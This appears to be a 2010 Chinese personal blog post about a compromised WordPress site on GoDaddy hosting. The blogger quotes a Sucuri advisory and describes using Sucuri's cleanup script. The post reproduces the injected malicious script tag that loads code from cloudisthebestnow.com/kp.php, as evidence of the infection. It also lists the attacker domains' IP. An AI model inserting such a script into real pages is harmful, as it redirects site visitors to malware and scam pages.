地精实验室

凡是用国外空间的都应该认识上面这个人吧？虽然不知道叫什么名字，但是大名鼎鼎的Godaddy的形象代言就是她。可惜，人脸蛋再好看有什么用处，godaddy还不是一样被黑，导致如我一样的大批无辜博客受到牵连。受到影响的主要是wordpress博客和其他php类型的网站。

事情过程是这样的：今天自己成功注册了个Google Voice，本来打算回来好好写下感受和注册方法，结果谁知道打开自己博客以后突然弹出一个对话框，其中包含malware attack字样，然后点击确定以后网页会开始模仿“我的电脑”的界面还是杀毒，最后结果当然杀一堆“病毒”。不过这个界面做的太假了，就算有病毒也不能在分区旁边出现提示啊……可惜当时太着急，没有截图。

发生这个情况以后我立刻迷茫了，因为以我对电脑的了解，自己机器应该还不会中毒中到这种地步。而且因为跳转的网站是英文，应该也不是ISP的http劫持。跳转到的网址是一个很奇怪的地址，使用Google搜索没有任何结果。另外，还有一个我不能确定的症状是后台的所有格式混乱。那个跳转网页似乎只出现在开机以后第一次访问，我开始怀疑这是有人在我空间挂了木马，于是就很随意的点开了源代码想看看。其实当时并没有会想到能发现什么有用的内容。结果谁知道就在页面的最下面我发现了这样一行代码：

  <script src="”http://cloudisthebestnow.com/kp.php”"></script>

稍微对wordpress有了解到人，甚至不用你对wordpress有了解，只要你稍微有些网络常识，都会知道这个肯定不是网页本身的代码。即使现在你访问这个地址还是可以看到java的源代码，我不懂java所以也不知道它写的是什么，不过毫无疑问一切的根源肯定是这里了。

于是我在Google搜索上面那个地址，结果发现原来是godaddy本身遭到了攻击导致大部分godaddy上的站点出现了这样的问题。链接如下：

http://blog.sucuri.net/2010/06/godaddy-sites-hacked-with-cloudisthebestnow.html

我大概翻译下：
如果你认为你在godaddy的麻烦结束了，抱歉，还没呢。我们确定东部时间昨天昨天下午3点（大概就是北京时间8号凌晨吧），godaddy的服务器再一次被攻击。恶意软件指向的地址 cloudisthebestnow.com/kp.php被插入了成千上万的主机中。
你在源代码中会看到这样的东西：

 script src = http://cloudisthebestnow.com/kp.php

它会重新定向使你的用户访问到一些“假的色情网站”。有趣的是这个地址所绑定的IP和最近一次解决了godaddy被攻击问题的人是同一个。

 $ host cloudisthebestnow.com
cloudisthebestnow.com has address 193.104.34.55
$ host losotrana.com
losotrana.com has address 193.104.34.55

接着下面写了一些简单的介绍，还有godaddy给用户的回复。这么大的事情godaddy居然不公布，而是你要问他他才告诉你。当然，还有最主要的清除方法：http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-the-latest-wordpress-hack.html对于大部分虚拟主机用户来说ssh的那个方法不行，所以直接去下载它提供的那个txt文件，地址是：http://sucuri.net/malware/helpers/wordpress-fix_php.txt

下载之后修改扩展名为php，放入你的空间里通过连接来访问，然后会花上几分钟，据说可以清除这个病毒。（注意，我是放在wordpress目录下面的，上面说如果运行以后没有清除，就放在一些子目录比如wp-admin下运行）我试验了一下，源代码中的那一行确实没有了，不过其他地方的因为我也没发现，所以不清楚，不过似乎现在博客是正常了。运行之后的情况如下图：

到此为止，算是把问题处理了，不过谁知道还有没有剩下的问题。godaddy这么大的IDC，居然多次出现这种情况，真是令人失望。更无耻的是，他们居然可以对此保持沉默，倒是天天打折的广告邮件发送的很频繁，真出了问题吱一声都没有。如果此次事件对网站还有其他什么影响，我会继续更新。